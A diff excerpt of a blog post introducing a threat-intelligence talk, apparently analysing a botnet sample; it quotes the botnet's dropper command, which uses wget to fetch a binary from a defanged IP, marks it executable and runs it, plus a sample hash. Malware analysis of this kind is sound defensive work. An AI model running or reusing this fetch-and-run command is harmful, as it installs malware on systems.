This is my presentation about threat intelligence at B33F H4CK1NG in May 2024, which is the book club under B33F 50μP CTF team.

 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -O blyat http://192.3.152[.]183/sparc; chmod +x blyat; ./blyat sonic

-I chose x86_64 for analysis (a familiar architecture), and it is likely that the botnet is compiled to be compatible across different versions so the content is probably same.
+I chose x86_64 for analysis (since it’s a familiar architecture), and it is likely that the botnet is compiled to be compatible across different versions so the content is probably same.

 Sample hash: 430004d50823dc20c6e1b0b34b76339b1cf7b58f1a00165e17e3af50fd4ea33f.
 It’s a vanilla UPX packed binary.